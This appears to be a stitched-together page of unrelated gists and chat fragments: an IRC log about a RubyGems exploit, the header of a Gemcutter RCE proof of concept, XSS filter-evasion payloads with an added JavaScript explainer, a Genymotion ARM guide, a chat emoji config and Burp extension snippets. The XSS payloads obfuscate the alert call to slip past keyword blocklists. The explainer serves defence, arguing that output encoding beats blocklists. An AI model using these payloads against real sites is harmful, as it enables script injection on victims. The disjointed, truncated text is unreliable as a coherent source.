Status #rubygemsX
[Status: @rubygems_status and http://status.rubygems.org | RubyGems 1.8.24 | http://rubygems.org/ | Idle for answers if it's not Pacific Time daytime]
[14:29] == Nilla_ [429948b1@gateway/web/freenode/ip.66.153.72.177] has joined #rubygems
[14:29] <mephux> wlll: it's a huge concern but once we do some forensics we'll know 100%
[14:29] == withloudhands [~robertwhi@rrcs-184-75-101-229.nyc.biz.rr.com] has joined #rubygems
[14:29] <Defiler> evan: I was thinking about adding a type whitelist to the YAML deserialization in rubygems; does that conflict with any of today's ongoing work?
[14:30] <benchMark> evan: Did you guys delete the exploit gem?
[14:30] <benchMark> I was expecting to see that in my grep.
[14:30] == nhocki_ [12bd2d9d@gateway/web/freenode/ip.18.189.45.157] has joined #rubygems
#!/usr/bin/env ruby
#
# Proof-of-Concept RCE exploit against Gemcutter
#
# ## Advisory
#
# ## Caveats
#
# ## Synopsis
#
@mccabe615
mccabe615 / gist:8230805
Created January 3, 2014 01:22
XSS filter payloads
window:
window["alert"]("ISR")
window["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
window["ale"+"\x72\x74"]()
window["\x61\x6c\x65\x72\x74"]()
window['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
window['ale'+'\x72\x74']()
window['\x61\x6c\x65\x72\x74']()
window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
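Why these payloads get past a keyword filter: the property name is never written as `alert`; it is either hex-escaped inside a string literal or assembled from the strings that JavaScript type coercion hands back (`"true"`, `"false"`, `"undefined"`, `"NaN"`), indexed with digit-free integers (`+[]` is 0, `-~[]` is 1, and so on). The following is an added example, not part of the gist: it reconstructs the name the same way the payloads do, decodes the `\xNN` form, and runs a naive `/alert/i` blocklist over constructed copies of the payload forms above to show which ones it misses. `decodeHexEscapes`, `naiveFilter` and `filterResults` are names chosen here for illustration.

```javascript
// Added example (not from the gist): how the coercion-based payloads spell "alert".

// String sources produced purely by type coercion, no letters a-l-e-r-t in the source.
const TRUE_STR = !![] + [];      // "true"
const FALSE_STR = ![] + [];      // "false"
const UNDEF_STR = [][+[]] + [];  // "undefined"
const NAN_STR = +{} + [];        // "NaN"

// Integer indices written without digits: ~[] is -1, so -~[] is 1, -~-~[] is 2, ...
const ZERO = +[];
const ONE = -~[];
const TWO = -~-~[];
const THREE = -~-~-~[];

// "NaN"[1] + "false"[2] + "undefined"[3] + "true"[1] + "true"[0]  ->  "alert"
function coercedName() {
  return NAN_STR[ONE] + FALSE_STR[TWO] + UNDEF_STR[THREE] + TRUE_STR[ONE] + TRUE_STR[ZERO];
}

// Evaluate only the bracket-index expression of a payload (the part between
// window[ and ]) in isolation, the way an analyst would to see what it resolves to.
function evalPropertyName(indexExpr) {
  return Function('return (' + indexExpr + ');')();
}

// Decode \xNN escapes as the JS parser would inside a string literal, so a filter
// can compare against the decoded form instead of the raw source text.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// A naive blocklist check of the kind found in many WAF rules.
function naiveFilter(payload) {
  return /alert/i.test(payload);
}

// Constructed sample payloads mirroring the three forms in the gist, as the plain
// source strings a filter would see.
const PAYLOADS = {
  plain: 'window["alert"]("ISR")',
  hex: 'window["\\x61\\x6c\\x65\\x72\\x74"]()',
  coerced: 'window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))',
};

// Run the filter over each payload, raw and after hex decoding.
function filterResults() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    out[name] = { raw: naiveFilter(p), decoded: naiveFilter(decodeHexEscapes(p)) };
  }
  return out;
}

console.log(coercedName());          // "alert"
console.log(filterResults());        // hex form is caught only after decoding; coerced form never
```

The takeaway for filter authors: decoding escapes closes the `\x61\x6c...` variant but does nothing against the coercion variant, which contains no recognisable keyword at all. A blocklist on the sink name cannot be made complete; output encoding at the injection point is the fix.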
mccabe615 / gist:8411428
Created January 14, 2014 01:25
GenyMotion ARM Fix
Genymotion is a virtual Android environment built on x86 and VirtualBox. It is not an ARM emulator, so its performance is far better than the Android SDK emulator's. However, in their latest update they removed both ARM translation and the Google Play apps (this is what causes the "INSTALL_FAILED_CPU_ABI_INCOMPATIBLE" errors). Many developers and users still find these features useful for various reasons, and their removal has forced people to look for alternatives to Genymotion.
This guide is for getting back both ARM Translation and Google Play apps in your Genymotion VM.
UPDATE-v1.1: I've gotten more up-to-date builds of libhoudini and have updated the ZIP. This fixes a lot of app crashes and hangs. Just flash the new one and it should work.
Download the following ZIPs:
ARM Translation Installer v1.1 - http://goo.gl/JBQmPa (mirrors on Dropbox)
Download the correct GApps for your Android version:
Google Apps for Android 4.3 - http://goo.im/gapps/gapps-jb-20130813-signed.zip (on Dropbox)
Google Apps for Android 4.2
56k: "https://123.campfirenow.com/images/56k.gif"
bell: ":bell:"
bezos: ":laughing::thought_balloon:"
bueller: "anyone?"
clowntown: "https://123.campfirenow.com/images/clowntown.gif"
cottoneyejoe: ":notes::hear_no_evil::notes:"
crickets: "hears crickets chirping"
dadgummit: "dad gummit!! :fishing_pole_and_fish:"
dangerzone: "https://123.campfirenow.com/images/dangerzone.png"
danielsan: ":fireworks: :trophy: :fireworks:"
mccabe615 / AssessmentChecklist.md
Created February 5, 2014 14:38
Assessment Checklist

##OWASP Top Ten##

###A1 Injection###

mccabe615 / Listener
Created February 7, 2014 04:41
Listener
// IHttpListener
@Override
public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo)
mccabe615 / gist:8860871
Last active August 29, 2015 13:56
Parameters
toolFlag - identifies which Burp tool the message comes from. In our case we only want messages from Intruder, whose flag is IBurpExtenderCallbacks.TOOL_INTRUDER (0x20, i.e. 32).
messageIsRequest - true when the message is a request, false when it is a response
messageInfo - holds the full request/response data of the message itself
byte[] request_byte = messageInfo.getRequest();
IParameter sig_param = helpers.getRequestParameter(request_byte, "signature");
mccabe615 / gist:8860891
Created February 7, 2014 11:13
Parameters2
// Only act on Intruder requests that actually carry a signature parameter.
// Compare against null directly: getRequestParameter returns null when the
// parameter is absent, so sig_param.equals(null) would throw a NullPointerException.
if (toolFlag == IBurpExtenderCallbacks.TOOL_INTRUDER && messageIsRequest && sig_param != null)
{
String param1 = helpers.getRequestParameter(request_byte, "param1").getValue();
String param2 = helpers.getRequestParameter(request_byte, "param2").getValue();
String param3 = helpers.getRequestParameter(request_byte, "param3").getValue();